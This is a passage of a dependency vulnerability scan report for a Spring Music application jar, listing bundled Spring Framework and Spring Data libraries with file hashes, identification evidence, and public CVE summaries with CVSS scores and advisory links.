OSSINDEX - [CVE-2018-1257] CWE-noinfo
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257
OSSIndex - https://jira.spring.io/browse/SPR-16731
OSSIndex - https://pivotal.io/security/cve-2018-1257
Vulnerable Software & Versions:
CVE-2020-5421
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.6) Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N References:
OSSINDEX - [CVE-2020-5421] CWE-noinfo
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421
OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421
Vulnerable Software & Versions:
CVE-2022-22950
In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions:
CVE-2023-20861
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2018-11039
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11039] CWE-noinfo
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039
OSSIndex - https://jira.spring.io/browse/SPR-16836
OSSIndex - https://pivotal.io/security/cve-2018-11039
Vulnerable Software & Versions:
CVE-2022-22968
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions:
CVE-2022-22970
In Spring Framework versions prior to 5.3.20+, 5.2.22+ and older unsupported versions, applications that handle file uploads are vulnerable to a DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-data-commons-2.0.6.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-commons-2.0.6.RELEASE.jar
MD5: 13ff69d6655acfbd8dce2885c5ff3b4d
SHA1: 4d65fdcbe258961e866f4f85c87c13193bbfd18c
SHA256: 8747a7a6d3cc7bd19f0992ccd4f56b40a9562ad0b3ad76d856c2e8a66134bf73
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | spring-data-commons | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | core | Highest
Vendor | jar | package name | data | Highest
Vendor | jar | package name | springframework | Highest
Vendor | Manifest | automatic-module-name | spring.data.commons | Medium
Vendor | pom | artifactid | spring-data-commons | Low
Vendor | pom | groupid | org.springframework.data | Highest
Vendor | pom | name | Spring Data Core | High
Vendor | pom | parent-artifactid | spring-data-parent | Low
Vendor | pom | parent-groupid | org.springframework.data.build | Medium
Product | file | name | spring-data-commons | High
Product | jar | package name | core | Highest
Product | jar | package name | data | Highest
Product | jar | package name | springframework | Highest
Product | Manifest | automatic-module-name | spring.data.commons | Medium
Product | Manifest | Implementation-Title | Spring Data Core | High
Product | pom | artifactid | spring-data-commons | Highest
Product | pom | groupid | org.springframework.data | Highest
Product | pom | name | Spring Data Core | High
Product | pom | parent-artifactid | spring-data-parent | Medium
Product | pom | parent-groupid | org.springframework.data.build | Medium
Version | Manifest | Implementation-Version | 2.0.6.RELEASE | High
Version | pom | version | 2.0.6.RELEASE | Highest
CVE-2018-1259
Spring Data Commons, versions 1.13 prior to 1.13.12 and 2.0 prior to 2.0.7, used in combination with XMLBeam 1.4.14 or earlier versions, contains a property binder vulnerability caused by improper restriction of XML external entity references as underlying library XMLBeam does not restrict external reference expansion. An unauthenticated remote malicious user can supply specially crafted request parameters against Spring Data's projection-based request payload binding to access arbitrary files on the system. CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-data-jpa-2.0.6.RELEASE.jar
Description: Spring Data module for JPA repositories.
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-jpa-2.0.6.RELEASE.jar
MD5: 47aae6a594965bf41a1120b75a690a13
SHA1: 02c683dfbd06551bfd6cc7e05f9d13f5c54c79ba
SHA256: e5b2b64c68ab1b2d04727ff49fc7d35921c06d1be7accfae6abc80cbb86cb1f7
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | spring-data-jpa | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | data | Highest
Vendor | jar | package name | jpa | Highest
Vendor | jar | package name | springframework | Highest
Vendor | Manifest | automatic-module-name | spring.data.jpa | Medium
Vendor | pom | artifactid | spring-data-jpa | Low
Vendor | pom | groupid | org.springframework.data | Highest
Vendor | pom | name | Spring Data JPA | High
Vendor | pom | parent-artifactid | spring-data-parent | Low
Vendor | pom | parent-groupid | org.springframework.data.build | Medium
Vendor | pom | url | http://projects.spring.io/spring-data-jpa | Highest
Product | file | name | spring-data-jpa | High
Product | jar | package name | data | Highest
Product | jar | package name | jpa | Highest
Product | jar | package name | springframework | Highest
Product | Manifest | automatic-module-name | spring.data.jpa | Medium
Product | Manifest | Implementation-Title | Spring Data JPA | High
Product | pom | artifactid | spring-data-jpa | Highest
Product | pom | groupid | org.springframework.data | Highest
Product | pom | name | Spring Data JPA | High
Product | pom | parent-artifactid | spring-data-parent | Medium
Product | pom | parent-groupid | org.springframework.data.build | Medium
Product | pom | url | http://projects.spring.io/spring-data-jpa | Medium
Version | Manifest | Implementation-Version | 2.0.6.RELEASE | High
Version | pom | version | 2.0.6.RELEASE | Highest
CVE-2019-3797 (OSSINDEX)
This affects Spring Data JPA in versions up to and including 2.1.5, 2.0.13 and 1.11.19. Derived queries using any of the predicates ‘startingWith’, ‘endingWith’ or ‘containing’ could return more results than anticipated when a maliciously crafted query parameter value is supplied. Also, LIKE expressions in manually defined queries could return unexpected results if the parameter values bound did not have escaped reserved characters properly. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework.data:spring-data-jpa:2.0.6.RELEASE:*:*:*:*:*:*:*
CVE-2019-3802 (OSSINDEX)
This affects Spring Data JPA in versions up to and including 2.1.6, 2.0.14 and 1.11.20. ExampleMatcher using ExampleMatcher.StringMatcher.STARTING, ExampleMatcher.StringMatcher.ENDING or ExampleMatcher.StringMatcher.CONTAINING could return more results than anticipated when a maliciously crafted example value is supplied. CWE-155 Improper Neutralization of Wildcards or Matching Symbols
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework.data:spring-data-jpa:2.0.6.RELEASE:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: spring-data-keyvalue-2.0.6.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-keyvalue-2.0.6.RELEASE.jar
MD5: 67b923530200be45290959020039e2f6
SHA1: 196bdab74df54f58eb8af77127235fe360c79f50
SHA256: 807b74576b9b2aa23c14a77c7a9763b84671b9a933600fa7f7544366c1f036c6
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | spring-data-keyvalue | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | data | Highest
Vendor | jar | package name | keyvalue | Highest
Vendor | jar | package name | springframework | Highest
Vendor | Manifest | automatic-module-name | spring.data.keyvalue | Medium
Vendor | pom | artifactid | spring-data-keyvalue | Low
Vendor | pom | groupid | org.springframework.data | Highest
Vendor | pom | name | Spring Data KeyValue | High
Vendor | pom | parent-artifactid | spring-data-parent | Low
Vendor | pom | parent-groupid | org.springframework.data.build | Medium
Product | file | name | spring-data-keyvalue | High
Product | jar | package name | data | Highest
Product | jar | package name | keyvalue | Highest
Product | jar | package name | springframework | Highest
Product | Manifest | automatic-module-name | spring.data.keyvalue | Medium
Product | Manifest | Implementation-Title | Spring Data KeyValue | High
Product | pom | artifactid | spring-data-keyvalue | Highest
Product | pom | groupid | org.springframework.data | Highest
Product | pom | name | Spring Data KeyValue | High
Product | pom | parent-artifactid | spring-data-parent | Medium
Product | pom | parent-groupid | org.springframework.data.build | Medium
Version | Manifest | Implementation-Version | 2.0.6.RELEASE | High
Version | pom | version | 2.0.6.RELEASE | Highest
spring-music-sqldb-1.0.jar: spring-data-mongodb-2.0.6.RELEASE.jar
Description: MongoDB support for Spring Data
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-mongodb-2.0.6.RELEASE.jar
MD5: 74ec3fbe42441e68b2c467f98414888b
SHA1: ee9fedc59c82ae75021ac1277f73ec87146670fd
SHA256: 1583dc32c5e39b78f3c0b452349830791be0740cf9b4fb291d65cf94ecadb265
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | spring-data-mongodb | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | core | Highest
Vendor | jar | package name | data | Highest
Vendor | jar | package name | mongodb | Highest
Vendor | jar | package name | springframework | Highest
Vendor | Manifest | automatic-module-name | spring.data.mongodb | Medium
Vendor | pom | artifactid | spring-data-mongodb | Low
Vendor | pom | groupid | org.springframework.data | Highest
Vendor | pom | name | Spring Data MongoDB - Core | High
Vendor | pom | parent-artifactid | spring-data-mongodb-parent | Low
Product | file | name | spring-data-mongodb | High
Product | jar | package name | core | Highest
Product | jar | package name | data | Highest
Product | jar | package name | mongodb | Highest
Product | jar | package name | springframework | Highest
Product | Manifest | automatic-module-name | spring.data.mongodb | Medium
Product | Manifest | Implementation-Title | Spring Data MongoDB - Core | High
Product | pom | artifactid | spring-data-mongodb | Highest
Product | pom | groupid | org.springframework.data | Highest
Product | pom | name | Spring Data MongoDB - Core | High
Product | pom | parent-artifactid | spring-data-mongodb-parent | Medium
Version | Manifest | Implementation-Version | 2.0.6.RELEASE | High
Version | pom | version | 2.0.6.RELEASE | Highest
CVE-2022-22980
A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized. CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-data-redis-2.0.6.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-redis-2.0.6.RELEASE.jar
MD5: b8e45b2e68ce0102fe7598df1c127e66
SHA1: bbe9a86b233e3bee31b396231a46a36905da9fb9
SHA256: 021ce83a42ae11aa7143a1c6b8449a1de18de8f29dfbd9706475ec100b700cfc
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | spring-data-redis | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | data | Highest
Vendor | jar | package name | redis | Highest
Vendor | jar | package name | springframework | Highest
Vendor | Manifest | automatic-module-name | spring.data.redis | Medium
Vendor | pom | artifactid | spring-data-redis | Low
Vendor | pom | groupid | org.springframework.data | Highest
Vendor | pom | name | Spring Data Redis | High
Vendor | pom | parent-artifactid | spring-data-parent | Low
Vendor | pom | parent-groupid | org.springframework.data.build | Medium
Product | file | name | spring-data-redis | High
Product | jar | package name | data | Highest
Product | jar | package name | redis | Highest
Product | jar | package name | springframework | Highest
Product | Manifest | automatic-module-name | spring.data.redis | Medium
Product | Manifest | Implementation-Title | Spring Data Redis | High
Product | pom | artifactid | spring-data-redis | Highest
Product | pom | groupid | org.springframework.data | Highest
Product | pom | name | Spring Data Redis | High
Product | pom | parent-artifactid | spring-data-parent | Medium
Product | pom | parent-groupid | org.springframework.data.build | Medium
Version | Manifest | Implementation-Version | 2.0.6.RELEASE | High
Version | pom | version | 2.0.6.RELEASE | Highest
spring-music-sqldb-1.0.jar: spring-expression-5.0.5.RELEASE.jar
Description: Spring Expression Language (SpEL)
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-expression-5.0.5.RELEASE.jar
MD5: 9677c528a2215d259d6ff0d820d1b415
SHA1: fc6c7a95aeb7d00f4c65c338b08d97767eb0dd99
SHA256: 0b935cc876323f04c9ad0015d7cb304f15fd62486d28e73e4f98ed1ed2dff828
Evidence
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | spring-expression | Highest
Vendor | central | groupid | org.springframework | Highest
Vendor | file | name | spring-expression | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | expression | Highest
Vendor | jar | package name | expression | Low
Vendor | jar | package name | spel | Low
Vendor | jar | package name | springframework | Low
Vendor | Manifest | automatic-module-name | spring.expression | Medium
Vendor | pom | artifactid | spring-expression | Low
Vendor | pom | developer email | jhoeller@pivotal.io | Low
Vendor | pom | developer id | jhoeller | Medium
Vendor | pom | developer name | Juergen Hoeller | Medium
Vendor | pom | groupid | org.springframework | Highest
Vendor | pom | name | Spring Expression Language (SpEL) | High
Vendor | pom | organization name | Spring IO | High
Vendor | pom | organization url | http://projects.spring.io/spring-framework | Medium
Vendor | pom | url | spring-projects/spring-framework | Highest
Product | central | artifactid | spring-expression | Highest
Product | file | name | spring-expression | High
Product | hint analyzer | product | springsource_spring_framework | Highest
Product | jar | package name | expression | Highest
Product | jar | package name | expression | Low
Product | jar | package name | spel | Low
Product | Manifest | automatic-module-name | spring.expression | Medium
Product | Manifest | Implementation-Title | spring-expression | High
Product | pom | artifactid | spring-expression | Highest
Product | pom | developer email | jhoeller@pivotal.io | Low
Product | pom | developer id | jhoeller | Low
Product | pom | developer name | Juergen Hoeller | Low
Product | pom | groupid | org.springframework | Highest
Product | pom | name | Spring Expression Language (SpEL) | High
Product | pom | organization name | Spring IO | Low
Product | pom | organization url | http://projects.spring.io/spring-framework | Low
Product | pom | url | spring-projects/spring-framework | High
Version | central | version | 5.0.5.RELEASE | Highest
Version | Manifest | Implementation-Version | 5.0.5.RELEASE | High
Version | pom | version | 5.0.5.RELEASE | Highest
CVE-2022-22965
CISA Known Exploited Vulnerability:
Product: VMware Spring Framework
Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability
Date Added: 2022-04-04
Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.
Required Action: Apply updates per vendor instructions.
Due Date: 2022-04-25
Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2018-1258
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258
OSSIndex - https://jira.spring.io/browse/SPR-16757
OSSIndex - https://pivotal.io/security/cve-2018-1258
Vulnerable Software & Versions:
CVE-2024-22259
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to an SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 (https://spring.io/security/cve-2024-22243), but with different input.
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2018-11040
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Neither is enabled by default in Spring Framework or Spring Boot; however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests.
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
* OSSIndex - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040
* OSSIndex - https://jira.spring.io/browse/SPR-16798
* OSSIndex - https://pivotal.io/security/cve-2018-11040
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and security_alert@emc.com): reference links tagged MAILING_LIST, MITIGATION, PATCH, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2018-15756
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable.
NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
* OSSIndex - [CVE-2018-15756] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756
* OSSIndex - https://pivotal.io/security/cve-2018-15756
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and security_alert@emc.com): reference links tagged MAILING_LIST, NOT_APPLICABLE, PATCH, THIRD_PARTY_ADVISORY, URL_REPURPOSED, VDB_ENTRY and VENDOR_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2020-5398
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.6) Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C
References:
Vulnerable Software & Versions:
CVE-2018-1257
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression denial of service attack.
NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P
References:
* OSSIndex - [CVE-2018-1257] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257
* OSSIndex - https://jira.spring.io/browse/SPR-16731
* OSSIndex - https://pivotal.io/security/cve-2018-1257
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and security_alert@emc.com): reference links tagged PATCH, THIRD_PARTY_ADVISORY, VDB_ENTRY and VENDOR_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2020-5421
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.
NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A
CVSSv2:
Base Score: LOW (3.6) Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N
References:
* OSSIndex - [CVE-2020-5421] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421
* OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and security@pivotal.io): reference links tagged NOT_APPLICABLE, PATCH, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2022-22950
In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2023-20861
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition.
CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2023-20863 (OSSINDEX)
In Spring Framework versions prior to 5.2.24.RELEASE, 5.3.27 and 6.0.8, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition.
CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-expression:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2018-11039
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allows web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack.
NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
* OSSIndex - [CVE-2018-11039] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039
* OSSIndex - https://jira.spring.io/browse/SPR-16836
* OSSIndex - https://pivotal.io/security/cve-2018-11039
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and security_alert@emc.com): reference links tagged BROKEN_LINK, MAILING_LIST, MITIGATION, PATCH, THIRD_PARTY_ADVISORY, VDB_ENTRY and VENDOR_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2024-38808 (OSSINDEX)
In Spring Framework versions 5.3.0 - 5.3.38 and older unsupported versions, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) expression that may cause a denial of service (DoS) condition.
Specifically, an application is vulnerable when the following is true:
* The application evaluates user-supplied SpEL expressions.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2024-38808 for details.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv4:
Base Score: MEDIUM (5.3) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-expression:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2022-22968
